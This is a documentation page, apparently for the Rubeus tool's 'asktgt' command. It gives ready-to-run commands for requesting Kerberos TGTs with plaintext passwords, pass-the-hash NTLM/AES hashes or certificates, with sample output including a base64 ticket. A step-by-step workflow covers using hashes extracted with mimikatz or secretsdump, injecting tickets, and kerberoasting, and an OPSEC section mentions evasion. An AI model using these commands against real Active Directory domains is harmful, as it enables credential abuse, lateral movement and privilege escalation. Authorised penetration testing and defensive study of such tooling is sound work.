Skip to main content

Overview

Request Ticket Granting Tickets (TGTs) from the domain controller using various authentication methods. The asktgt command is the foundation of most Kerberos operations and supports multiple authentication mechanisms for maximum flexibility.

Password Auth

Use plaintext passwords for standard authentication

Hash Auth

Pass-the-hash with NTLM, AES128, or AES256 hashes

Certificate Auth

PKINIT authentication with X.509 certificates

Syntax

Rubeus.exe asktgt /user:USER /password:PASSWORD [options]

Authentication Methods

  • Password Authentication
  • Hash Authentication
  • Certificate Authentication
password
string
required
Plaintext password for the target user
enctype
string
Encryption type for authentication
Rubeus.exe asktgt /user:admin /password:Password123!
Password authentication generates the most legitimate-looking authentication events but requires knowledge of the plaintext password.

Required Parameters

user
string
required
Target username for TGT request

Optional Parameters

Response Format

  • Successful Response
  • Error Response
[*] Action: Ask TGT

[*] Using rc4_hmac hash: 32ed87bdb5fdc5e9cba88547376818d4
[*] Building AS-REQ (w/ preauth) for: 'corp.local\admin'
[*] Using domain controller: dc01.corp.local (192.168.1.10)
[*] Sending AS-REQ to dc01.corp.local:88
[*] Received AS-REP
[*] Ticket expires: 10/25/2024 11:23:45 PM
[*] Service ticket expires: 11/1/2024 1:23:45 PM
[*] Base64(ticket.kirbi):

      doIFujCCBbagAwIBBaEDAgEWooIEujCCBLahggS2MIIEsqADAgEFoQwbCkNPUlAuTE9D
      QUyhHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCmNvcnAubG9jYWyjggR9MIIEeaADAgESoQMC
      AQKiggRrBIIEZ2P+9l3v9...
Action
string
Command being executed (Ask TGT)
Authentication Method
string
Hash type used for authentication
Domain Controller
string
Target DC and IP address used
Ticket Expiration
datetime
When the TGT expires
Service Ticket Expiration
datetime
When service tickets expire
Base64 Ticket
string
TGT in base64 format for use with other commands

Examples

  • Basic Operations
  • Advanced Usage
  • Process Creation
  • Special Scenarios
# Basic password authentication
Rubeus.exe asktgt /user:admin /password:Password123!

# Hash-based authentication
Rubeus.exe asktgt /user:admin /rc4:32ed87bdb5fdc5e9cba88547376818d4

# Certificate authentication
Rubeus.exe asktgt /user:admin /certificate:admin.pfx /password:certpass

Integration Workflows

1

Credential Preparation

Obtain the necessary credentials for TGT request:
# Generate hashes if you have passwords
Rubeus.exe hash /password:Password123! /user:admin /domain:corp.local

# Or use extracted hashes from other tools
# mimikatz, secretsdump, etc.
2

TGT Request

Request the initial TGT using your chosen authentication method:
# Choose based on available credentials
Rubeus.exe asktgt /user:admin /rc4:hash /outfile:admin.kirbi /ptt
3

Verification

Verify the TGT was successfully obtained and applied:
# List current tickets
Rubeus.exe klist

# Describe the TGT
Rubeus.exe describe /ticket:admin.kirbi
4

Follow-up Operations

Use the TGT for subsequent operations:
# Request service tickets
Rubeus.exe asktgs /service:cifs/fileserver.corp.local

# Perform kerberoasting
Rubeus.exe kerberoast

OPSEC Considerations

Detection Vectors: TGT requests generate authentication logs and network traffic that can be monitored by defenders.
  • Detection Risks
  • Evasion Techniques

Troubleshooting

asktgs

Request service tickets using the obtained TGT

ptt

Inject TGT into logon session manually

describe

Analyze TGT structure and contents

hash

Generate hashes from passwords for authentication